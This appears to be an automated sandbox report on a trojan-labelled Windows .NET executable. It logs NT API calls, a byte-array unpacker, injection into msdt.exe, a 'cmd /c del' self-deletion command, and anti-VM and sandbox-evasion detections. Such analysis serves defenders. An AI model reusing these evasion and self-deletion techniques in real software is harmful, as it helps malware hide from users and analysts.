          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A10 NtQuerySection,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929560 NtWriteFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A770 NtOpenThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929760 NtOpenProcess,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18690 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18710 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187BC NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1873A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185DA NtCreateFile,
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291189120.0000000000C80000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294459774.0000000006490000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294190854.0000000006030000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000000.286959339.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348145495.0000000001B6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HkE0tD0g4NXKJfy.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile read: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe:Zone.IdentifierJump to behavior
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HkE0tD0g4NXKJfy.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/4
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_01
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addbook.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addbook.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addcustomer.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addcustomer.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addbook.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addbook.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/addcustomer.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: views/addcustomer.baml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: i/ReturnValueNameAttribu;component/views/addbook.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: /ReturnValueNameAttribu;component/views/borrowfrombookview.xamlu/ReturnValueNameAttribu;component/views/borrowingview.xamlo/ReturnValueNameAttribu;component/views/changebook.xamlw/ReturnValueNameAttribu;component/views/changecustomer.xamls/ReturnValueNameAttribu;component/views/customerview.xamlw/ReturnValueNameAttribu;component/views/deletecustomer.xamlm/ReturnValueNameAttribu;component/views/errorview.xamlq/ReturnValueNameAttribu;component/views/smallextras.xamlq/ReturnValueNameAttribu;component/views/addcustomer.xaml
          Source: HkE0tD0g4NXKJfy.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: HkE0tD0g4NXKJfy.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HkE0tD0g4NXKJfy.exe.c10000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HkE0tD0g4NXKJfy.exe.c10000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.HkE0tD0g4NXKJfy.exe.e60000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C192F5 push ds; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C19347 push ds; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C19361 push ds; retf
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041C529 push esi; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041B7D5 push eax; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E692F5 push ds; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E69361 push ds; retf
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E69347 push ds; ret
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0193D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0477D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B88C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B822 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B82B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1BE43 push esi; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1B7D5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85414523612

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.HkE0tD0g4NXKJfy.exe.317b220.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HkE0tD0g4NXKJfy.exe.30e8edc.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HkE0tD0g4NXKJfy.exe PID: 5624, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
